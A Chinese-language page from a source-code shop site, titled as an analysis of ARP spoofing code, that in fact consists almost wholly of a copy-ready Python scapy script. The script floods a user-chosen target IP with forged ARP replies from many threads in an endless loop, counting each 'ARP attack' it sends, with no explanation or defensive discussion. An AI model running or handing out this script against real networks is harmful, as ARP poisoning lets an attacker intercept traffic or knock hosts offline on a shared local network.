源码网商城,靠谱的源码在线交易网站 我的订单 购物车 帮助

源码网商城

python发送arp欺骗攻击代码分析

  • 时间:2021-07-21 07:16 编辑: 来源: 阅读:
  • 扫一扫,手机访问
摘要:python发送arp欺骗攻击代码分析
[u]复制代码[/u] 代码如下:
# -*- coding: cp936 -*- from scapy.all import * from threading import Thread,Lock,activeCount BROADCASTMAC = getmacbyip('192.168.0.120') class Loop(Thread):     def __init__(self,ip):         Thread.__init__(self)         self.ip = ip     def run(self):         global BROADCASTMAC         arp = ARP()         arp.psrc = '192.168.0.251'         arp.hwsrc = BROADCASTMAC         arp.pdst = self.ip         arp.op = 2         sr1(arp,verbose = 0,retry = 0,timeout = 3) class Main(Thread):     def __init__(self,ip):         Thread.__init__(self)         self.ip = ip     def run(self):         limit = 100         total = 0         while True:             if activeCount() < limit:                 Loop(self.ip).start()                 total = total + 1             print '目前已进行了ARP攻击的次数为:'+str(total) if __name__ == '__main__':     ip = raw_input('请输入要进行ARP攻击的机器IP:')     Main(ip = ip).start()
  • 全部评论(0)
联系客服
客服电话:
400-000-3129
微信版

扫一扫进微信版
返回顶部